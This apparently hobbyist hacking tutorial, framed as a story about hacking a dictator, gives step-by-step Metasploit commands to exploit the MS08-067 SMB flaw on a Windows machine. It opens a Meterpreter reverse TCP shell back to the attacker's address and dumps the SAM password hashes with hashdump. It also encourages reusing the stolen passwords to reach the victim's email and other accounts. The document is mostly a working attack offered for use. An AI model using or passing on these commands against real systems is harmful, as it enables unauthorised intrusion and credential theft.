
How to Remotely Grab Encrypted Passwords from any Computer



There is a vicious, evil dictator bent on destroying the earth, and in one of our last hacks we successfully got into his computer and saved the world from nuclear destruction. After that, we covered our tracks so that no one would know what we had done, and we even built a hack to check in on his computer from time to time so that we could track what he was doing next.

With this new hack, we'll grab the passwords on the dictator's computer so we can access his PC via his account - or anyone else's account on his computer, including the most important account - that of the system administrator.


Windows stores passwords in encrypted form in a file called the SAM file. This file resides at c:\windows\system32\config\sam. If we have access to his computer, as we already do, we can obtain a copy of the encrypted passwords, transfer them to our computer, and crack them at a later time.

So, let's fire up our trusted hacking tool, Metasploit, and go get those passwords!

Step 1: Hack the System

Again, let's use a tried and true exploit; type:

  • msf> use exploit/windows/smb/ms08_067_netapi



Now, let's set the payload to our all-powerful Meterpreter.

  • msf (ms08_067_netapi)> set payload /windows/meterpreter/reverse_tcp



It is always a good idea at this point to check our options.



As you can see, we will need LHOST (our computer's IP address) and RHOST (the victim's IP address). Let's set these now.

  • msf (ms08_067_netapi)> set RHOST 192.168.1.108
  • msf (ms08_067_netapi)> set LHOST 192.168.1.109

With everything set, now all that's left to do is exploit!

  • msf (ms08_067_netapi)> exploit



We now have the all-powerful Meterpreter prompt on the computer of a maniacal dictator!

Step 2: Grab the password file

As you can see from my previous tutorials, Meterpreter has several powerful scripts built-in. For this, we will be using one called hashdump.

Just a little explanation before we grab those passwords ...


For security purposes, most operating systems (including all modern versions of Windows) store user passwords as hashes. This is a one-way encryption that makes passwords unreadable to people. These hashes are what we are after, which is why the script is called hashdump.

So, let’s go grab those hashes!

  • meterpreter> hashdump



As you can see, we now have several users with their encrypted password hashes. At the moment we can't read them, but come back for my next lesson and I'll show you how to crack them so we can use them at our leisure.

Remember, once we have the corrupt dictator’s password, he may well use that same password for other things (e.g., email, secure locations, etc.), which gives us access to many of his secure assets.
